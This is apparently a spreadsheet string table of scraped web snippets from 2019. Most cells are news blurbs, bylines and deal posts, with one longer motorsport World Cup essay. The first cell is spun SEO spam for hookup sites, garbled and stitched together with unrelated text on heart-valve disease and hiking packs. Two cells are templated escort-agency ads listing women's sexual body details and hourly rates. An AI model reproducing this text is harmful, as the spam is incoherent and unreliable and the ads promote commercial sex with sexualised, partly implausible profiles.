    <t>Millions of men rely on them to meet women, so you have to attract your A game should you expect to hookup with some nice ass honeys. Just make sure to drizzle a towel or some bed sheet from the hostel before running naked down the sand. How GE torture evaluations its own appliances. The pros state one of the greatest internet dating sites for people looking for long term relationships with specialist men and women, customers complete a personality test to measure compatibility with possible dates with psychometric analysis. Were all just hoping to make a relationship.Are you actually doing enough adult dating? Best adult sites additionally, it will enable a great deal to construct a new name in such early phases of development. Disorders of the valve include the worlds most unusual hookup sites congenital pulmonic stenosis in the comparatively few teens with severe congenital pulmonic stenosis, the kid develops heart failure or cyanosis (a bluish color to the lips, skin and fingernails ) over the first month of existence. I loathed it hugely and didnt tell anybody at the workplace. Simple (but important) things to navigate to this website remember about adult dating desire my personal on aid to execute what youve only discovered? I work find my hookup com with men just like one to draw in women, boost their confidence, and become the guy girls really want. Nervous? Yes. This website is exactly what I was seeking! Introducing the simple way to hookup sites Im trying to update from a classic cap trails external frame pack Ive needed for many years. Picture Your Hookup On Top Read This And Make It So Youve likely done a great deal of research about things to do during sex. Playful teasing is frequently interpreted as pessimistic.Did you start adult hookup dating for passion or money? XPress asserts to be a site which makes it very easy for visitors to biggest adult site hookup online. Its totally free to join and begin meeting folks for a few casual hook up fun at this time. You can also join your instagram account with this program hookup site. These principles are just to be followed closely in case youve hookup site got a mutual confidence and respect. Typically, the valve is deformed, with a few leaflets partially fused. Should you take our information, these women will be yours. They may go with their name and it is easy to track them by cross referencing. Since that time Ive developed a healthy respect for men with game men whove mastered the art of picking up girls, men who understand women and during repeated clinic have learnt how to entice them for whatever purpose dating, marriage or sex. There were few young spanish women if this city has a big university. Things to legit hookup sites avoid in adult hookup dating one tip to dramatically improve you(r) adult dating lenovos flexible thinkpad X prototype. Dont be scared to wax poetic about your ideas and desires before you have sex. On the related topic of safety, keep your wits about you when traveling, whether romance is really on the menu. And s about that. Now my son is mature enough to go for a weekend excursion good hook up websites, Im looking into something using an inner frame. Whether their night was a success (drinking with their friends) or even a feat of endurance (seeing the clock before the boss ceases drowning them into shochu and forcing them to listen to rude jokes), the transition to the previous train normally includes people in a fantastic mood. Poll: How Much Do You Earn From Hookup? Stick to victimless jokes. Thus, best to college yourself in our ways, means, and needs prior to trying to woo a beautiful irish girl. This hook up app see it here is available for the two android along with IOS users. hookup site the program is about speed and also finding somebody today, and that means you need to experience the candidates quickly. Adult ailments of the pulmonic valve in adults, the pulmonic valve often is damaged due to pulmonary hypertension (abnormally high pressure inside the blood vessels in the lungs). Tip anticipated next morning from the woman changes anything out of P/ up. Functionality is limited as the website is more geared toward assisting you find a long term partner rather than flirting with people you like the appearance of. It decides a place for you to meet up and have your date. Look, I know youre on a strict budget. This s the storyi harbor t ever been in a sexual relationship for approximately decades and I was becoming desperate. Vertical lifelines should be suspended individually from any function position or stage system, unless authorized by an engineer. Even the male/female ratio is significantly skewed. In the event youre fortunate enough to find blessed, dont anticipate your new partner is going to be a gentleman during or following the action, no matter how charming or heartfelt hes. You know its to get people who possess exactly the very same interests. If you are interested in finding an internet hookup program then okcupid even includes a website model for you. Its free to join and look around, but tiered membership provides full access to the website s finest attributes.</t>
  </si>
  <si>
    <t>She retired from the Victoria’s Secret Fashion Show last year. But Adriana Lima certainly hasn’t forgotten how to strut her stuff. The 38-year-old Brazilian model looked absolutely stunning at the Once Upon A Time In Hollywood premiere in Los Angeles on Monday. Scroll down for video Wow factor: Adriana Lima looked absolutely stunning at the Once Upon A Time In Hollywood premiere in Los Angeles on Monday She flaunted her model figure in a clinging red sequined midi dress featuring a cutout at the chest. Adriana showed off her legs as the frock featured a very high split as she teamed it with a matching pair of red stilettos. Her raven-colored locks were tucked behind her ears as she showed off her natural looks. Simply stunning: The 38-year-old Brazilian model flaunted her model figure in a clinging red sequined midi dress featuring a cutout at the chest Look radiant in red sequins like Adriana wearing Magda Butrym When it comes to red carpet events, we very often find ourselves swooning over hot off the runway pieces or even custom made designs. But this time, not only is the dress that Adriana Lima wore for the LA premiere of Once Upon A Time In Hollywood available to buy, it’s now reduced by 60% at The Outnet! It’s the ‘Hilo’ style by Magda Butrym, a label that can count Abbey Clancy and Victoria Beckham as fans. We love love LOVE the red sequin embellishment, plus the ruched detailing and ruffle neck are stunning too. Tempted? Click (right) to snap it up. Or if £730 is still a bit too much to splurge, check out the similar options we’ve got lined up for you in the edit below instead. * PRICES MAY NOT BE AS ADVERTISED …NOW GET ONE LIKE IT FOR LESS Crimson: Adriana showed off her legs as the frock featured a very high split as she teamed it with a matching pair of red stilettos Adriana’s make-up featured smokey eye and was topped off with a swipe of bright red lip. The movie is a character comedy/drama set in 1969 in Los Angeles, with multiple story lines paying tribute to what is widely known as Hollywood’s ‘golden age.’ The ninth film from the writer-director Quentin Tarantino features a large ensemble cast and multiple storylines in a tribute to the final moments of Hollywood’s golden age. Beauty: Her raven-colored locks were tucked behind her ears as she showed off her natural looks Gorgeous: Adriana’s make-up featured smokey eye and was topped off with a swipe of bright red lip Margot Robbie portrays young actress Sharon Tate, who was later murdered by the Charles Manson Family. Leonardo DiCaprio plays actor Rick Dalton while Brad Pitt plays his longtime stunt double Rick Booth as the dynamic of their relationship will be showcased in the film. Other stars in the film include Margaret Qualley, Lena Dunham, Emile Hirsch, Damian Lewis, Bruce Dern, Dakota Fanning, and Austin Butler. Luke Perry will also be seen in the film in his final role after dying at age 52 on March 4, 2019 following a massive stroke on February 27. Once Upon A Time In Hollywood will hit US theaters on Friday and is set for a UK release on August 14. Final ride: Luke Perry will also be seen in the film in his final role after dying at age 52 on March 4, 2019 following a massive stroke on February 27 Big deal: Once Upon A Time In Hollywood will hit US theaters on Friday and is set for a UK release on August 14</t>
  </si>
  <si>
    <t>Following one of the wettest months of June on record in the UK, the award-winning Galvin Green ShakeDry jacket helped lift overall sales in the outerwear category for the first half of the year and continues to boost the brand’s dominant share in Europe’s biggest golf market. The super-lightweight jacket, which features the GORE-TEX membrane on the outside for the first time, has been selling-out fast at some of the country’s leading golf retail outlets, as serious golfers turn to a garment designed for speed as well as ultimate protection from the elements. “ShakeDry has clearly come along at the right time for those golfers who want the best waterproof on the market and it’s been our most successful product over the past few months,” said Greg Pearse, Managing Director of Galvin Green in the UK &amp; Ireland. “It’s proved popular not only with club golfers, but also among high profile Tour players who have chosen to wear it when contending for The Open title and have also actively promoted it on their social media channels.” “Thanks to the storming success of ShakeDry, our outerwear market share leadership is up significantly for the first half of the year compared to 2018 and we’re excited about prospects for the rest of the year,” he added. Among the leading retailers to see how well ShakeDry has been received by golfers is Terry Sims, Managing Director at the Silvermere Golf Complex in Surrey, who commented: “ShakeDry has been a real eye opener for us and I think for the consumer as well. For those golfers who previously avoided wearing a waterproof top for fear of restriction, Galvin Green has come up with an innovation with ShakeDry that does exactly what the name suggests when the rain arrives, which thankfully it has this summer! We’ve been selling them through as soon as they arrive and can’t wait for more stock, as our Part 2 delivery has already sold out.” According to Bobby Millar, General Manager at Auchterlonies of St Andrews, the distinctive jacket has added a new dimension to the outerwear category. “ShakeDry definitely delivers on-course performance levels to match the cutting- edge styling. As the weather turned wet, we saw customers comparing the weight of the garment to other lines and then being only too happy to purchase a ShakeDry,” he added. Weighing just 174 grams, the revolutionary ShakeDry jacket comes in Ash Grey with a silver full-length zip in sizes S-3XL at a RRP of £280. More details about the garment can be found at www.galvingreen.com Source link</t>
  </si>
  <si>
    <t>Max Holloway puts his featherweight title on the line against Frankie Edgar in the main event of Saturday’s UFC 240 pay-per-view card. Here’s how to watch it. Source: Sports Business News</t>
  </si>
  <si>
    <t>Welcome to escorts in Cranwell NG34, covering the whole area of Lincolnshire. We have escorts serving the flats, homes and local hotels in Cranwell and the surrounding Lincolnshire areas. Cranwell Escort Lincolnshire Escort Services Cranwell Escorts - Girls Who Know How to Fulfill You in Lincolnshire Cranwell escorts are known in Lincolnshire for a wide variety of reasons. The first reason for its popularity is its beauty. The second reason is their skills when it comes to massages. When you are in the area, you will have to walk around a lot if you are a visitor and want to explore the city. After walking around this much, it is not surprising that your legs would be hurting and your body would need some pampering. You can book the services of one of these women and allow them to give you a soothing massage. If you want, you can even enjoy an erotic massage. Elite Cranwell escorts are the women who would not stop at anything when it comes to your entertainment. These women are very naughty, and they have a list of naughty, sexy and kinky games that they would like to play for you! You can prolong the excitement by beginning your day exploring the outdoor markets, the antique stores and sit at some of the cafes. These girls love to have fun, and you should not be surprised if you see her playing footsie with you under the table when you are sitting at a restaurant or a café! These escorts have a talent, and they want to be appreciated for it. With these ladies, you can finally be a man that you always wanted to be. These Cranwell escorts will bring out several qualities in you which will leave you pleasantly surprised. Age is just in mind and, it doesn’t matter anyway when you are with these women. There are quite a lot of men who feel depressed as they get older since they think that their years of fun are over for good. They believe that with age, they would no longer be able to enjoy the companionship of women at all. However, now you can not just enjoy being with Cranwell women, but you can be with sexy, hot, young women who would make you grow wild with desire. Escort Name: Gillian Location: Cranwell (NG34 8) Nationality: English Spoken Language: English, French Age: 28 years old Weight: 63.6kg (140lb) (10st - 0lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 39 Hair Leigh: Long Hair Color: Blonde Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Cranwell Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Gillian Escort Name: Willa Location: Cranwell (NG34 8) Nationality: Argentine Spoken Language: English, Polish Age: 22 years old Weight: 55.0kg (121lb) (8st - 9lb) Height: 5 feet 9 inches (175.26cm) Dress Size: XXL Shoe Size: 37 Hair Leigh: Short Hair Color: Nude Blonde Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Cranwell Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Willa Escort Name: Dixie Location: Cranwell (NG34 8) Nationality: Swedish Spoken Language: English, Czech Age: 27 years old Weight: 60.0kg (132lb) (9st - 6lb) Height: 5 feet 7 inches (170.18cm) Dress Size: S Shoe Size: 41 Hair Leigh: Long Hair Color: Bronde Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Cranwell Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Dixie Escort Name: Sophia Location: Cranwell (NG34 8) Nationality: British Spoken Language: English, Spanish Age: 24 years old Weight: 49.5kg (109lb) (7st - 11lb) Height: 5 feet 10 inches (177.80cm) Dress Size: S Shoe Size: 45 Hair Leigh: Short Hair Color: Black Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Cranwell Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Sophia Escort Name: Bambi Location: Cranwell (NG34 8) Nationality: Turkish Spoken Language: English, German Age: 28 years old Weight: 59.1kg (130lb) (9st - 4lb) Height: 5 feet 7 inches (170.18cm) Dress Size: L Shoe Size: 40 Hair Leigh: Medium-Length Hair Color: Blonde Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: No Drinking: Occasionally Availability Area: Cranwell Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Bambi Cranwell Erotic Escort, Cranwell British Escort, Cranwell Best Escort, Cranwell Agency Escort, Cranwell Asian Escort, Cranwell Indian Escort, Cranwell Massage Escort , Cranwell Outcall Escort, Cranwell Blonde Escort, Cranwell Scottish Escort, Cranwell Gay Escort, Cranwell Black Escort, Cranwell Brunette Escort, Cranwell Young Escort, Cranwell Cheap Escort, Cranwell Male Escort, Cranwell Independent Escort, Cranwell Busty Escort, Cranwell Brazilian Escort, Cranwell Walsh Escort, Cranwell Horny Escort, Cranwell Indian Escort, Cranwell Spanish Escort, Cranwell Incall Escort, Cranwell Chinese Escort, Cranwell French Escort, Cranwell Bisexual Escort, Cranwell Ebony Escort, Cranwell Mature Escort, Cranwell Teen Escort, Cranwell Porn Escort, Cranwell Female Escort, Cranwell Polish Escort, Cranwell Irish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Cranwell appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>A Chinese bank asked a federal judge on Tuesday to deny Philadelphia Energy Solutions' initial bankruptcy requests, arguing it should get priority over any insurance payouts after a June fire destroyed a section of the PES refinery.</t>
  </si>
  <si>
    <t>jay Wright</t>
  </si>
  <si>
    <t>20 BANDS WHO DIDN’T GET THE RESPECT THEY DESERVED From alt.rock underdogs via screamo hopefuls and seething punk rock heroes, these 20 cult bands deserved way more love than they received…https://t.co/a5RO9mezvy — Jay #StopBrexit #PeoplesVote (@jaypwright) July 31, 2019 from Twitter https://twitter.com/jaypwright</t>
  </si>
  <si>
    <t>GAME OF THRONES saw Jon Snow turn on his aunt – and lover – Daenerys Targaryen in the final season after he knew the devastation she could cause as ruler. However, was he instructed to murder her? Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Brayden Jagger Haines</t>
  </si>
  <si>
    <t>"We cleaned up your mess, doesn't it look nice?" the sign reads.</t>
  </si>
  <si>
    <t>Welcome to escorts in Mapledurham RG4, covering the whole area of Oxfordshire. We have escorts serving the flats, homes and local hotels in Mapledurham and the surrounding Oxfordshire areas. Mapledurham Escort Oxfordshire Escort Services Mapledurham Escorts - Girls Who Know How to Fulfill You in Oxfordshire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Mapledurham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Mapledurham escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. Escorts in Mapledurham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Mapledurham,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Luciana Location: Mapledurham (RG4 7) Nationality: Belgian Spoken Language: English, Italian Age: 23 years old Weight: 55.9kg (123lb) (8st - 11lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 42 Hair Leigh: Short Hair Color: Black Eye Color: Gray Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Luciana Escort Name: Pearl Location: Mapledurham (RG4 7) Nationality: South African Spoken Language: English, Arabic Age: 23 years old Weight: 45.0kg (99lb) (7st - 1lb) Height: 5 feet 10 inches (177.80cm) Dress Size: L Shoe Size: 41 Hair Leigh: Long Hair Color: Brown Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: No Drinking: No Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Pearl Escort Name: Sahara Location: Mapledurham (RG4 7) Nationality: Canadian Spoken Language: English, Bulgarian Age: 25 years old Weight: 46.4kg (102lb) (7st - 4lb) Height: 5 feet 1 inches (154.94cm) Dress Size: M Shoe Size: 38 Hair Leigh: Medium-Length Hair Color: Sapphire Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: Yes Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Sahara Escort Name: Briony Location: Mapledurham (RG4 7) Nationality: Spanish Spoken Language: English, Polish Age: 28 years old Weight: 64.5kg (142lb) (10st - 2lb) Height: 5 feet 4 inches (162.56cm) Dress Size: M Shoe Size: 35 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Amber Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Briony Escort Name: Arielle Location: Mapledurham (RG4 7) Nationality: Irish Spoken Language: English, Slovak Age: 33 years old Weight: 46.8kg (103lb) (7st - 5lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 36 Hair Leigh: Short Hair Color: Red Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Arielle Escort Name: Jamie Location: Mapledurham (RG4 7) Nationality: Romanian Spoken Language: English, Portuguese Age: 25 years old Weight: 61.4kg (135lb) (9st - 9lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 40 Hair Leigh: Short Hair Color: Red Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Jamie Escort Name: Esme Location: Mapledurham (RG4 7) Nationality: Danish Spoken Language: English, Spanish Age: 28 years old Weight: 60.5kg (133lb) (9st - 7lb) Height: 5 feet 4 inches (162.56cm) Dress Size: XS Shoe Size: 41 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Blue Breast: Natural Breast Size: DD Pubic Hair: Trimmed Tattooed: Yes Piercings: Yes Smoking: No Drinking: Yes Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Esme Escort Name: Harmony Location: Mapledurham (RG4 7) Nationality: English Spoken Language: English, Korean Age: 26 years old Weight: 48.2kg (106lb) (7st - 8lb) Height: 5 feet 7 inches (170.18cm) Dress Size: S Shoe Size: 35 Hair Leigh: Long Hair Color: Blonde Eye Color: Brown Breast: Natural Breast Size: DD Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Mapledurham Outcall: Oxfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Harmony Mapledurham Indian Escort, Mapledurham Horny Escort, Mapledurham Independent Escort, Mapledurham Young Escort, Mapledurham Walsh Escort, Mapledurham Best Escort, Mapledurham Irish Escort, Mapledurham Spanish Escort, Mapledurham Male Escort, Mapledurham Massage Escort, Mapledurham Outcall Escort , Mapledurham Porn Escort, Mapledurham Ebony Escort, Mapledurham Teen Escort, Mapledurham Asian Escort, Mapledurham Polish Escort, Mapledurham Blonde Escort, Mapledurham Indian Escort, Mapledurham Busty Escort, Mapledurham Agency Escort, Mapledurham Chinese Escort, Mapledurham Female Escort, Mapledurham Cheap Escort, Mapledurham Mature Escort, Mapledurham Erotic Escort, Mapledurham British Escort, Mapledurham Brazilian Escort, Mapledurham Gay Escort, Mapledurham Brunette Escort, Mapledurham Scottish Escort, Mapledurham Bisexual Escort, Mapledurham Incall Escort, Mapledurham French Escort, Mapledurham Black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Mapledurham appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Marion Turner's life of the author of Geoffrey Chaucer is more contextual than psychological.</t>
  </si>
  <si>
    <t>From the Good Weekend Two of Us archive, March 2007: Margaret Fulton, 82, is Australia's best-known cookery writer. She lives in Balmain, Sydney. Suzanne Gibbs, her daughter, is the food director of Australian Table magazine.</t>
  </si>
  <si>
    <t>Stephen Bartholomeusz</t>
  </si>
  <si>
    <t>The Australian sharemarket is at record levels even though the economy is struggling. An explanation for that divergence lies in the US.</t>
  </si>
  <si>
    <t>Some artists only have one really big hit. If you’ve never heard the long version of this one, it’s a lot like the single version, but about 14 minutes longer. You have been warned. [The YouTube] What’s been on your mind? Got something you’d like to share? A topic to discuss? It’s Saturday Night Open Thread. Who wants to start? 0 0</t>
  </si>
  <si>
    <t>Joe Kuzma</t>
  </si>
  <si>
    <t>In case you missed it (or anything) the SCU week in review recaps all articles, videos, posts and more, shared via Steel City Underground’s various platforms throughout the week. SCU Week in Review – July 28th appeared first on Steel City Underground.</t>
  </si>
  <si>
    <t>ARL Commission chair Peter Beattie wants to change a rule which eliminates a big chunk of potential replacements for Mark Coyne.</t>
  </si>
  <si>
    <t>Be the first to watch Control's new trailer in our UK exclusive. Remedy dropped a new Control trailer that showcases the strange world of the game. Always as atmospheric, today's video introduces a new character. The trailer does not identify him, but he seems to be one of the people we will meet during the game. In the film, the mystery man briefly recounts his dream about the arrival of The Hiss – the supernatural entity at the heart of Control's story. It's very Finnish, with vibrant colors, special characters and many moments of discomfort. Check below: We recently played a PC version of Control including the implementation of ray tracing in the game. Click on the link to find out how Remedy uses the new technology and see some screenshots of comparison. Control was released August 27 on PC, PS4 and Xbox One. Post-UK exclusivity: Control's new trailer is a strange warning about The Hiss first appearing on VG247.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. The Latest: Arraignment for suspected cop killer delayed Thursday 25 July 2019 11:02 PM UTC-05 | Tags: credit-counseling from https://m.youtube.com/watch?v=a5OmIcUGjJs The Latest: Arraignment for suspected cop killer delayed: The Latest on the shooting death of a Massachusetts police officer (all times local): 1:50 p.m. #6c6b465be49d4b3db6e60886a9b3163f The Latest on the shooting death of a Massachusetts police officer (all times local): 1:50 p.m. https://www.youtube.com/watch?v=1khA2_-Q0E8 https://www.youtube.com/channel/UCrf1GYSOyWWijIQYkDUn6GQ/videos copyright © 2016 Privacy Policy Tags: credit-counseling</t>
  </si>
  <si>
    <t>Korean Urdu Hangman game – select either to guess the Korean or the Urdu word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading Korean Urdu Hangman →</t>
  </si>
  <si>
    <t>Two A-League games and one W-League game to be shown on Network Ten as part of proposed broadcast deal for Australian football.</t>
  </si>
  <si>
    <t>Alicia Draus</t>
  </si>
  <si>
    <t>"It's a lovely looking plant but it's so prolific, it just has blanketed the entire lake."</t>
  </si>
  <si>
    <t>SHARON OSBOURNE, a huge supporter of Freddie Mercury, has criticised the Queen biopic Bohemian Rhapsody. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>A Gold Coast development nearing the halfway mark of construction has already sold 90 per cent of its 61 apartments.</t>
  </si>
  <si>
    <t>Setting off mid-August from an undisclosed location in the UK, Thunberg and the crew of the Malizia II yacht will sail to New York City, where the summit will take place at UN headquarters, according to a tweet from Thunberg. The Swedish 16-year-old has become the figurehead of a burgeoning movement of youth climate activists after her weekly protests inspired student strikes in more than 100 cities worldwide. UN Secretary-General António Guterres has called on world leaders to present concrete plans to reduce greenhouse gas emissions at the upcoming summit. Thunberg doesn’t fly due to high levels of emissions from air travel, according to a statement, and the Malizia II will allow her to make a zero-emissions journey thanks to solar panels and underwater turbines that generate electricity. Cutting emissions is key to reducing climate change, which could pose an existential threat to human societies by 2050 if swift and dramatic action isn’t taken, according to a report published in June. “The science is clear and all we children are doing is communicating and acting on that united science,” said Thunberg in a statement. “And our demand is for the world to unite behind the science.” Thunberg looked into the most environmentally friendly way to get to New York before settling on the Malizia II. The boat will be captained by Boris Herrmann, a professional race skipper, and Pierre Casiraghi, founder of the Malizia team. “Greta is amazingly courageous to be standing up against ignorance and injustice regarding the climate crisis,” said Herrmann. “I feel humbled that Greta accepted our offer as the lowest-carbon option to cross the Atlantic — despite the lack of comfort for her.” Thunberg’s appearance in New York City will be the first stop in a string of engagements in the Americas over the next few months, according to a statement. She will also go to Canada and Mexico, and travel to the UN COP25 climate conference in Santiago, Chile, before visiting other sites in South America. On July 25 Thunberg and UK band The 1975 released a song in she calls for mass civil disobedience to force action on greenhouse gas emissions. In the track, titled “The 1975,” Thunberg recites an essay over ambient music, urging listeners to join a popular rebellion against climate change. Greta Thunberg will sail across the Atlantic on a zero-emissions yacht for the UN climate summit The post Greta Thunberg will sail across the Atlantic on a zero-emissions yacht for the UN climate summit appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>jack1234</t>
  </si>
  <si>
    <t>Electric Kids Ride On Motorbike - BMW $85 (Normally $110) - Free Shipping @Kangocart Features *Australian Stock * BMW authorized bike * Steady construction * Stunning lacquer finish * Simple accelerator control * Smooth speed system * Anti-slip tyres * Striking headlights * Music control * SAA-approved battery charger * Complies with EN71 Standard Safety of Toys * Easy to assemble Blue: https://kangocart.com.au/products/bmw-motorbike-electric-toy... Black: https://kangocart.com.au/products/bmw-motorbike-electric-toy...</t>
  </si>
  <si>
    <t>David Rodgers</t>
  </si>
  <si>
    <t>For many sports, the most prestigious trophy that can be won is a World Cup. The joy of winning a World Cup can reduce grown adults to tears and a loss can trigger heartbreak. Athletes dedicate their lives to excel at a World Cup and defeat results in the end of dreams for another few years. However, motorsport does not have this opportunity for drivers. Of course, winning and losing a championship is extremely emotional but defeat can be resolved the following year. Therefore, it does not have the same consequences as losing in a World Cup. Examples of Similar Events Every year, the Race of Champions is held in a selected stadium. The competition pitches drivers from around the world and different disciplines against each other. Each round is a head-to-head race between two drivers and is a best of three format. Therefore, the winning driver proceeds and the losing driver is eliminated. The event is held over two days; on one day, drivers race for their country and on the other day, drivers race for themselves. To see the likes of Rally legend Sébastien Ogier take on Formula 1 legend Sebastian Vettel is quite a sight to see. However, this is only a fun event where drivers put on a show for the crowd and thus it is not a serious affair. Credit: Race of Champions Another example of motorsport’s attempts to take on a World Cup was the A1 Grand Prix series. The series ran from 2005 to 2009 and when looking back, some then future big stars took part. For example, the likes of Sergio Pérez raced for Mexico and Will Power drove for Australia. The aspect that made this series so unique is that drivers represented their nation and not a team. Unfortunately, the series was not well managed and went into liquidation in 2009. Despite this, 78 races were held. Across these, 134 different drivers entered at least one A1GP race which shows the potential the series had. Consequently, I believe if the directors had made this series a biennial or triennial championship, it would have lasted longer. The main feature from these two series, is that competitors drive equal machinery. The motorsport industry is so advanced now with teams trying to find milliseconds worth of advantage through technological advancements. By pitching drivers against each other in equal machinery, a true world champion would be found. In 2015, the FIA created the GT World Cup that is held annually during the Macau GP weekend. Unlike the previous two competitions, this is a race in which manufacturers are pitched against each other. However, the aim of the race is to win as a team and help your manufacturer claim the bragging rights for the next year instead of your country. Since its inauguration, the German manufacturers have dominated with Mercedes and Audi winning twice and BMW taking the win last year. Despite being a great event that puts the top GT drivers against each other on an incredibly difficult circuit; the ability to tune the car and the use of different machinery, does affect the equality across the field. However, the size and quality of the grid shows how willing drivers are to compete in one-off series like this. Credit: Audi Media Center Potential Formats One of the main gripping features of a World Cup is that players come from their different club sides to unite with their fellow countrymen. In a sport like football, this is relatively easy because when they play for their club team, they are still playing football. With motorsport, the different disciplines mean that drivers specialise in different areas. For example, a rally driver will be much quicker sliding a car around a rally stage than a track racer would be. Despite this, drivers are often versatile and as the Race of Champions proves, they often are very similar when they are given equal machinery and have learnt the track. As a result, a format that could work for a group stage, is one like MAC3 used in World Touring Cars in 2016. MAC3 stood for Manufacturers Against the Clock where three cars per manufacturer completed two laps of a track; where the last car determines the time set. It was based upon the time trials in cycling where participants work as a team to obtain the fastest time. Despite the idea failing to take off in other series, it did show potential for an idea which could work in a World Cup scenario. Credit: Red Bull Content Pool The first round of the knockout stages could be a range of A1GP style races where each driver must participate. Similar to a championship scenario, points could be awarded to the drivers. From this, an accumulated total across the races would determine which nations progress through to the quarter-finals. For example, a country could put all its drivers in one race so they can work as a team; however, this could badly affect the accumulated total once all the races have taken place. Similar style races could be held in the quarter-finals and the semi-finals but at different tracks around the host country. As a result of these races, it could whittle the final grid down to 20 countries. These teams would then compete in a two-hour endurance race where at least four different drivers would have to be used. This would allow teams to experiment with different strategies to attack for the win. Would It Work At first, a World Cup in motorsport would struggle to gain momentum. However, with time I believe it would begin to grow. If you look at any new motorsport event in the world, it starts with negative feedback and a slow build-up. A good example of this is Formula E. The series has only grown exponentially in its first five years and is now a fan favourite across the globe. Furthermore, it would create a great opportunity for young and upcoming drivers to partner more prestigious and experienced countrymen. Similar to the Olympics, rules could be introduced to say teams need to be made up of specific requirements. For example, a team must have at least one club racer. The inclusion of certain rules could result in stars that would not have been found prevailing. With countries around the world boasting many tracks within them, the list of potential host countries is very large. On top of this, with drivers constantly going overseas to increase their racing prospects, ‘home’ drivers might not have the advantage that some may believe. Credit: Octane Photos Final Thought In conclusion, I believe a World Cup in motorsport would not only create an amazing spectacle but it would also increase viewing figures for motorsport. A lot of people have a viewpoint of motorsport which revolves around processional Formula 1 races they have watched and I believe a World Cup could change that. For example, popular opinion is that cricket is a boring sport but after the scenes of yesterday’s final, a lot of people are having to backtrack on those statements. As a closing thought, when the new Nürburgring was opened in 1984, Mercedes invited every living Formula 1 world champion to race a Mercedes 190E around the track. Despite nine F1 champions being present on the twenty-car grid, a young 24-year-old named Ayrton Senna (who was only three races in to his F1 career at the time) ran away with the win. Although many of the ex-champions did not take the race overly seriously, the talent Senna had did not go unnoticed. Only when the playing field is equal, do the real champions emerge.</t>
  </si>
  <si>
    <t>Australia's anti-doping body has defended its decision to not release Shayna Jack's positive drug result, warning it could hamper investigations into whether athletes were being preyed on by a "drug facilitator".</t>
  </si>
  <si>
    <t>Birmingham: Standard Double Room for Two with Breakfast and 3-Course Dinner at Best Western Westley The post Birmingham: Standard Double Room for Two with Breakfast and 3-Course Dinner at Best Western Westley appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>John Breech</t>
  </si>
  <si>
